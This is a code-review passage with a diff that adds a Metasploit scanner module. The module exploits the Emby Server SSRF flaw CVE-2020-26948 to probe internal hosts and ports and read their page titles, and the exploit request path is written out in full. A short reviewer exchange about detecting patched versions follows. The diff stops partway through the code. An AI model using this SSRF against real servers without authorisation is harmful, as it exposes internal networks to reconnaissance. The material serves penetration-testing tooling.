modules/auxiliary/scanner/emby_scan.rb

```diff
@@ -0,0 +1,106 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/btnz-k/msf_emby
+# Exploit Title: Emby SSRF HTTP Scanner
+# Date: 2021.03.01
+# Exploit Author: Btnz
+# Vendor Homepage: https://emby.media/
+# Software Link: https://emby.media/download.html
+# Version: Prior to 4.5
+# Tested on: Ubuntu, Windows
+# CVE: CVE-2020-26948
+##
+# frozen_string_literal: true
+
+# MSF Auxiliary Class
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Capture
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name' => 'Emby SSRF HTTP Scanner',
+      'Description' => '
+      Utilizes the SSRF vulnerability in Emby Server prior to 4.5.0 to attempt to pull the
+      title tag from internal websites. Based on the vulnerability CVE-2020-26948.
+      ',
+      'Author' => 'Btnz',
+      'Version' => '1.0.2021.03.01.01',
+      'License' => MSF_LICENSE
+    )
+
+    deregister_options('VHOST', 'RPORT', 'FILTER', 'INTERFACE', 'PCAPFILE', 'SNAPLEN', 'SSL')
+
+    register_options(
+      [
+        OptBool.new('STORE_NOTES', [true, 'Store the information in notes. Use "notes -t http.title" to view', true]),
+        OptBool.new('SHOW_TITLES', [true, 'Show the titles on the console as they are grabbed', true]),
+        OptString.new('EMBY_SERVER', [true, 'IP to scan (eg 10.10.10.18))', '']),
+        OptInt.new('EMBY_PORT', [true, 'Web UI port for Emby Server (e.g. 8096)', '8096']),
+        OptString.new('PORTS', [true, 'Ports to scan (e.g. 22-25,80,110-900)', '80,8080,8081,8888'])
+      ]
+    )
+  end
+
+  def run_host(target_host)
+    # Do some checking to ensure data is submitted
+    dports = Rex::Socket.portspec_crack(datastore['PORTS'])
+    raise Msf::OptionValidateError, ['PORTS'] if dports.empty?
+
+    # loop through the IPs
+    dports.each do |p|
+      vprint_status("Attempting SSRF with target http://#{target_host}:#{p}")
+      uri = "/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://#{target_host}:#{p}"
+
+      res = Net::HTTP.get_response(datastore['EMBY_SERVER'], uri, datastore['EMBY_PORT'])
+
+      # Check for Response
+      if res.nil?
+        vprint_error("http://#{target_host}:#{p} - No response")
+        next
+      end
+
```

Comment:
by chance does non-vulnerable Emby give back a response which would let you know the version isn't vulnerable and therefore the module could bail out?
For instance:
vuln version port open: 200 response
vuln version port closed: 404 response
non-vulnerable version: 500 response

Reply:
Unfortunately, it does not. Emby will sit and attempt to load up the page, and end up resulting in a timeout.